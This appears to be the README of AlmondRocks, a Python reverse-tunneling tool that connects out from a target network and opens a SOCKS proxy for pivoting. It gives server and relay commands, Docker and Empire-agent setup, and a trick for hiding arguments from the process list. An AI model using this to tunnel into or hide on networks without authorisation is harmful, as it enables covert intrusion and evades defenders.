
In motherland, target network calls you!

Primary LanguagePython


AlmondRocks ("arox") is a tunneling tool that connects out from a target network and provides a (limited) SOCKSv5 interface. The tunnel connection is currently a binary protocol under TLS.

This tool is currently in BETA. The biggest known issue at the moment is lack of tunnel peer authentication.


  • Python 2.7



The server receives tunnel connections and opens a SOCKS proxy port.


The relay connects out from target to a server. All subsequent traffic proxied through the SOCKS port on the server will be tunneled through the target.


Server (standalone)

The -h flag shows a help menu. Listen on 443/tcp for tunnel connections, and listen on 1080/tcp for SOCKS clients:

python arox.py -v server --tunnel-addr --socks-addr --cert ssl/cert.pem --key ssl/key.pem

Server (Docker)

The server is Dockerized for convenience. To use default certs (not recommended):

[root]# docker pull klustic/arox:latest
[root]# docker run --rm -it -p 1080:1080 -p 443:4433 --name arox klustic/arox

To override the default certs, mount a volume from a directory containing cert.pem and key.pem:

[root]# docker pull klustic/arox:latest
[root]# docker run --rm -it -p 1080:1080 -p 443:4433 --name arox -v $(pwd)/ssl:/opt/arox/ssl:ro klustic/arox

Relay (standalone)

The -h flag shows a help menu. Connect to master at

python arox.py -v relay --tunnel-addr

Relay (Empire)

First, setup your AROX server (see above). Once you have an Empire agent connected, issues the following commands to Empire:

interact <sessionId>
usemodule management/multi/socks
set server <AROX server IP/domain>:<AROX server port>

NOTE: AROX v1.0.0 broke compatibility with previous versions. The current version is not merged into EmpireProject yet. To use the current version, issue this command before starting Empire:

cp -rv Empire/* /opt/Empire/   ## Or wherever you have installed Empire

Advanced Usage

In some cases you may want to hide commandline options in the process list. AROX supports passing arguments via stdin on the command line:

echo -v relay --tunnel-addr | python arox.py

Looks like this in the process list:

[root@testing-c67 arox]# echo -v relay --tunnel-addr | python2.7 arox.py
[-] Checking for options on stdin...
[+] Options received
[2018-05-15 14:39:36]     INFO SocksRelay: Connected to
[root@testing-c67 arox]# bg
[root@testing-c67 arox]# ps -ef --forest
root       1585   1584  0 14:04 pts/0    00:00:00                  \_ /bin/bash
root       1676   1585  0 14:39 pts/0    00:00:00                      \_ python2.7 arox.py
root       1677   1585  0 14:39 pts/0    00:00:00                      \_ ps -ef --forest

Listing active connections through the AROX tunnel

There is an easter egg that lists all connections that are opened via arox tunnel. Press CTRL-\ on the arox server terminal to view statistics.

[2018-05-15 19:43:34]     INFO Tunnel: Closed channel: <Channel id=304960167 remote_addr=www.pandora.com[]:443 local_addr=>
[2018-05-15 19:43:34]     INFO Tunnel: Closed channel: <Channel id=304960168 remote_addr=www.pandora.com[]:443 local_addr=>
^\[2018-05-15 19:43:42]  WARNING SocksServer:
[2018-05-15 19:43:42]  WARNING SocksServer: ~~~ Stats for nerds : 5 open channels, tunnel peer is ~~~
[2018-05-15 19:43:42]  WARNING SocksServer:   <Channel id=304960141 remote_addr=www.pandora.com[]:443 local_addr=>
[2018-05-15 19:43:42]  WARNING SocksServer:   <Channel id=304960142 remote_addr=lt500.tritondigital.com[]:443 local_addr=>
[2018-05-15 19:43:42]  WARNING SocksServer:   <Channel id=304960143 remote_addr=stats.pandora.com[]:443 local_addr=>
[2018-05-15 19:43:42]  WARNING SocksServer:   <Channel id=304960145 remote_addr=adserver.pandora.com[]:443 local_addr=>
[2018-05-15 19:43:42]  WARNING SocksServer:   <Channel id=304960146 remote_addr=adserver.pandora.com[]:443 local_addr=>
[2018-05-15 19:43:42]  WARNING SocksServer: ~~~ End of Stats ~~~